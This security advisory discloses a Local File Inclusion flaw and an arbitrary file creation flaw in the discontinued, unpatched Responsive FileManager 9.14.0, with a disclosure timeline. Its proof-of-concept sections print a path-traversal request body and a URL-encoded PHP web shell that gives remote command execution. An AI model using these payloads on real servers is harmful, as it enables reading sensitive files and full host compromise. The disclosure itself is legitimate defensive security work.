Cyber Security Associates (CSA) identified a Local File Inclusion (LFI) and arbitrary file creation issue within Responsive FileManager Version 9.14.0 which are tracked under CVE-2026-37266.
Responsive FileManager is a PHP-based file manager allows for the storage, retrieval and creation of files while also providing filters to protect against local file inclusion, path traversal and malicious file's being written to the application. The files uploaded using integration of FileManager are typically intended able to be accessed by any source, without authentication, for ease of hosting images and the like.
The Responsive FileManager project has been discontinued and therefore no fixes will be made, therefore its current version (9.14.0) remains vulnerable.
The risk posed by both these vulnerabilities are classed as critical, as it can lead to exposure of sensitive files, data breaches, disruption of services, and/or full compromise of underlying hosts.
A weakness was identified in the software’s download feature that allows for the ability to trick the system into exposing files from the server. This type of vulnerability is known as Local File Inclusion (LFI). If exploited, it could be used to gain access to sensitive information such as passwords, configuration details, or source code. In some cases, this kind of issue can also be used as a stepping stone to take full control of the server.
The following affected components and parameters were responsible for the LFI:
|
Component |
Parameter |
|
filemanager/force_download.php’ |
name |
A successful proof-of-concept LFI would look like the following:
Figure 1 – File Manager responds to payload with the sensitive Windows HOSTS file
A weakness within the software’s file creation feature allowed the ability to upload files of any type to the server, despite the in-built controls that exist on the software. If exploited, it could lead to the storage of malicious files and execution PHP scripts. In such cases, this can result in the full compromise of underlying hosts.
The following affected components and parameters were responsible for Arbitrary File Creation:
|
Component |
Parameter |
|
filemanager/execute.php?action=create_file |
name |
A successful proof-of-concept exploitation of Arbitrary File Creation would look like the following:
Figure 2 – Successful upload of the ‘newshell.php’ file. Code execution has been achieved as seen in the URL.
A Local File Inclusion (LFI) vulnerability can allow attackers to access sensitive files stored on the server, such as configuration files, credentials, or application source code. This information disclosure can expose details that assist in further attacks, including database compromise or privilege escalation. In some environments, where sensitive credentials are exposed or, if user input is written to server-side files such as logs or uploads, LFI may be escalated to remote code execution, giving an attacker full control over the affected host. Successful exploitation may therefore result in the compromise of confidential data, disruption of application integrity, and complete loss of system availability.
To demonstrate the impact of this LFI, CSA has used the Responsive FileManger to view the ‘/etc/hosts’ Windows file. To do so, the following actions were taken:
The body of the POST request should contain the following elements:
path=&name=..\..\..\..\..\..\windows\system32\drivers\etc\hosts
This retrieves the ‘/etc/hosts’ Windows file, as shown previously in ‘Figure 1’.
It is possible to create arbitrary files using the Responsive FileManager by bypassing the existing controls for file creation. This can be done using the file manager’s ‘execute.php’, specifically the ‘create_file’ action, to create arbitrary files that would otherwise not be allowed with current controls. This was done using ‘..’ in the name parameter. As this software typically is used for image and file handling, uploaded files are often accessible from multiple locations without the need of authentication. Under standard configurations, this could result in the execution of uploaded PHP code. Preventing execution generally requires explicit server-side restrictions, which are not always present.
In such cases, an attacker could upload a malicious and leverage it to execute arbitrary commands on the server. This would allow full control over the underlying host, including the ability to exfiltrate sensitive data, modify application functionality, pivot into internal systems, or disrupt service availability. This can therefore result in complete loss of confidentiality, integrity, and availability of any affected environment.
Furthermore, it's possible to leverage this vulnerability to store malicious files such as viruses on applications implementing Responsive FileManager.
To demonstrate the impact of this vulnerability, CSA has used the Responsive FileManger to obtain a working webshell to perform command execution on the underlying host. To do so, the following actions were taken:
The body of the POST request should contain the following elements:
path=%2F&path_thumb=&name=newshell.php..&new_content=%3Chtml%3E%0A%3Cbody%3E%0A%3Cform+method%3D%22GET%22+name%3D%22%3C%3Fphp+echo+basename(%24_SERVER%5B'PHP_SELF'%5D)%3B+%3F%3E%22%3E%0A%3Cinput+type%3D%22TEXT%22+name%3D%22cmd%22+autofocus+id%3D%22cmd%22+size%3D%2280%22%3E%0A%3Cinput+type%3D%22SUBMIT%22+value%3D%22Execute%22%3E%0A%3C%2Fform%3E%0A%3Cpre%3E%0A%3C%3Fphp%0A++++if(isset(%24_GET%5B'cmd'%5D))%0A++++%7B%0A++++++++system(%24_GET%5B'cmd'%5D+.+'+2%3E%261')%3B%0A++++%7D%0A%3F%3E%0A%3C%2Fpre%3E%0A%3C%2Fbody%3E%0A%3C%2Fhtml%3E
This achieves a working web shell and remote command execution, as shown previously in ‘Figure 2’.
Responsive FileManager has responded that the project has been discontinued and has confirmed that there will be no fixes will be made or any updates in the future. Therefore, this product is currently vulnerable to the arbitrary file creation issue.
21/08/2025: Vulnerability identified by Julian Nguyen and reported to the vendor.
21/08/2025: The vendor has responded informing us that the project has been discontinued and that no fixes will be made.
21/08/2025: Permission was asked to post this blogpost before the allotted 90 days given as response time during the responsible disclosure procedure, as no fixes are to be made.
22/08/2025: Confirmation was provided by the vendor.
28/04/2026: Mitre assigns the vulnerability a CVE number.